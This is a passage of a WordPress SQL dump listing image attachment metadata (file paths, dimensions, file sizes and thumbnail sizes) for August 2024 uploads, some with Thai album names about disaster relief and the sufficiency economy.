(2602,936,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214248_0.jpg\";s:8:\"filesize\";i:336296;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214248_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14411;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214248_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98333;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214248_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7263;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214248_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62770;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214248_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:181110;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214248_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17927;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2603,937,'_wp_attached_file','2024/08/S__69214250_0.jpg'),
(2604,937,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214250_0.jpg\";s:8:\"filesize\";i:543408;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214250_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15261;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214250_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139145;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214250_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7575;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214250_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83264;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214250_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:276622;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214250_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19179;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2605,938,'_wp_attached_file','2024/08/S__69214252_0.jpg'),
(2606,938,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214252_0.jpg\";s:8:\"filesize\";i:649229;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214252_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16647;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214252_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162700;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214252_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7963;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214252_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95678;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214252_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:327256;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214252_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21287;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2607,939,'_wp_attached_file','2024/08/S__69214246_0.jpg'),
(2608,939,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214246_0.jpg\";s:8:\"filesize\";i:339739;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214246_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13512;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214246_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96975;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214246_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7497;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214246_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60965;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214246_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180892;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214246_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16637;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2609,940,'_wp_attached_file','2024/08/S__69214249_0.jpg'),
(2610,940,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214249_0.jpg\";s:8:\"filesize\";i:339093;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214249_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13155;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214249_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94838;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214249_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7526;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214249_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59512;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214249_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:179287;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214249_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16576;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2611,941,'_wp_attached_file','2024/08/S__69214251_0.jpg'),
(2612,941,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214251_0.jpg\";s:8:\"filesize\";i:672184;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214251_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16785;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214251_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:167080;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214251_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7700;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214251_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98175;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214251_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:335651;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214251_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21672;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2613,942,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21.jpg'),
(2614,942,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21.jpg\";s:8:\"filesize\";i:1188196;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22539;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:176259;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9254;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108926;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:349785;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:570633;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25224;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2615,943,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20.jpg'),
(2616,943,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20.jpg\";s:8:\"filesize\";i:1155047;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22864;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:169968;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9292;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106095;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:332111;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:543392;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24770;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2617,944,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19.jpg'),
(2618,944,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19.jpg\";s:8:\"filesize\";i:1118922;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23937;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177784;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9492;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111488;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:339909;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:541443;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27193;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2619,945,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17.jpg'),
(2620,945,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17.jpg\";s:8:\"filesize\";i:1148882;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24192;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:179766;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9691;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112408;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:347674;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:555313;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27294;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2621,946,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18.jpg'),
(2622,946,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18.jpg\";s:8:\"filesize\";i:1163521;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23469;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178476;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9381;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111170;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:347493;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:558971;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25656;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2623,947,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15.jpg'),
(2624,947,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15.jpg\";s:8:\"filesize\";i:1387845;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22161;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:208899;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8564;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_